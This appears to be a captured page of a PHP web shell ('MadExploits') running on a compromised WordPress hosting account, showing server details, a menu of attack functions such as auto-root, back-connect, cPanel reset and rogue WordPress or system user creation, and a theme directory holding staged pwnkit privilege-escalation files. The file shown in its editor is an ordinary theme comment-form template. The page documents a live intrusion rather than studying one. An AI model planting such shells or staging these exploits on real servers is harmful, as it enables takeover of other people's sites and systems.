Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
www /
wp-content /
themes /
imroz /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
helper
[ DIR ]
drwxr-xr-x
lab
[ DIR ]
drwxr-xr-x
options
[ DIR ]
drwxr-xr-x
underscore
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
comment-form.php
6.49
KB
-rw-r--r--
comment-nav.php
585
B
-rw-r--r--
demo-import-config.php
22.07
KB
-rw-r--r--
global-functions.php
4.89
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
register-custom-fonts.php
1.14
KB
-rw-r--r--
scripts.php
4.5
KB
-rw-r--r--
tgm-config.php
2.29
KB
-rw-r--r--
widget-area-register.php
2.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : comment-form.php
<?php /** * Comment Form * * @package imroz */ function imroz_pingback($comment, $args, $depth) { if ( 'div' === $args['style'] ) { $tag = 'div'; $add_below = 'pingback'; } else { $tag = 'li'; $add_below = 'div-pingback'; } ?> <<?php echo esc_html( $tag ); ?> <?php comment_class( empty( $args['has_children'] ) ? '' : 'parent' ) ?> id="comment-<?php comment_ID() ?>"> <?php if ( 'div' != $args['style'] ) : ?> <div id="div-comment-<?php comment_ID() ?>" class="comment-body blog-comment pingback-body-class"> <div class="comment-replay-all"> <div class="single-comment"> <div class="parent-comment comment-border"> <?php endif; ?> <div class="comment-text pingback-text copy"> <div class="comment-box-inner"> <div class="comment-meta commentmetadata"> <?php if ( $comment->comment_approved == '0' ) : ?> <em class="comment-awaiting-moderation"><?php echo esc_html__( 'Your comment is awaiting moderation.', 'imroz' ); ?></em> <br /> <?php endif; ?> <b> <cite class="author-name"><?php comment_author_link(); ?></cite> </b> <div class="comment--date--time"> <?php printf( esc_html__('%1$s at %2$s', 'imroz'), get_comment_date(), get_comment_time()); ?> </div> </div> <?php comment_text(); ?> </div> <div class="reply-edit"> <?php edit_comment_link();?> <div class="reply"> <?php $post_id = get_the_ID(); $comment_id =get_comment_ID(); //get the setting configured in the admin panel under settings discussions "Enable threaded (nested) comments levels deep" $max_depth = get_option('thread_comments_depth'); //add max_depth to the array and give it the value from above and set the depth to 1 $default = array( 'add_below' => 'comment', 'respond_id' => 'respondtest', 'reply_text' => __(' <i class="rbt feather-corner-down-right"></i> Reply', 'imroz'), 'login_text' => esc_html__('Log in to Reply', 'imroz'), 'depth' => 1, 'before' => '', 'after' => '', 'max_depth' => $max_depth ); comment_reply_link($default,$comment_id,$post_id); ?> </div> </div> </div> <?php if ( 'div' != $args['style'] ) : ?> </div> </div> </div> </div> <?php endif; ?> <?php } function imroz_comment($comment, $args, $depth) { if ( 'div' === $args['style'] ) { $tag = 'div'; $add_below = 'comment'; } else { $tag = 'li'; $add_below = 'div-comment'; } ?> <<?php echo esc_html( $tag ); ?> <?php comment_class( empty( $args['has_children'] ) ? '' : 'parent' ) ?> id="comment-<?php comment_ID() ?>"> <?php if ( 'div' != $args['style'] ) : ?> <div id="div-comment-<?php comment_ID() ?>" class="comment-body blog-comment"> <div class="comment-replay-all"> <div class="single-comment"> <div class="parent-comment comment-border"> <?php endif; ?> <div class="comment-author comment-img"> <?php if ( $args['avatar_size'] != 0 ) echo get_avatar( $comment, 50, '', '', $avt_args = array( 'class' => 'comment-avatar img-fluid' ) ); ?> <h6 class="m-b-20"> <div class="commenter"><?php comment_author_link(); ?></div> <div class="time-spent"> <?php printf( esc_html__('%1$s at %2$s', 'imroz'), get_comment_date(), get_comment_time()); ?> </div> </h6> </div> <?php if ( $comment->comment_approved == '0' ) : ?> <h6 class="m-b-15"><em class="comment-awaiting-moderation"><span class="feather-clock theme-color"> </span><?php echo esc_html__( 'Your comment is awaiting moderation.', 'imroz' ); ?></em></h6> <?php endif; ?> <div class="comment-text"> <?php comment_text(); ?> </div> <div class="reply-edit"> <?php edit_comment_link();?> <div class="reply"> <?php $post_id = get_the_ID(); $comment_id =get_comment_ID(); //get the setting configured in the admin panel under settings discussions "Enable threaded (nested) comments levels deep" $max_depth = get_option('thread_comments_depth'); //add max_depth to the array and give it the value from above and set the depth to 1 $default = array( 'add_below' => 'comment', 'respond_id' => 'respond', 'reply_text' => __(' <i class="rbt feather-corner-down-right"></i> Reply', 'imroz'), 'login_text' => esc_html__('Log in to Reply', 'imroz'), 'depth' => 1, 'before' => '', 'after' => '', 'max_depth' => $max_depth ); comment_reply_link($default,$comment_id,$post_id); ?> </div> </div> <?php if ( 'div' != $args['style'] ) : ?> </div> </div> </div> </div> <?php endif; ?> <?php }
Close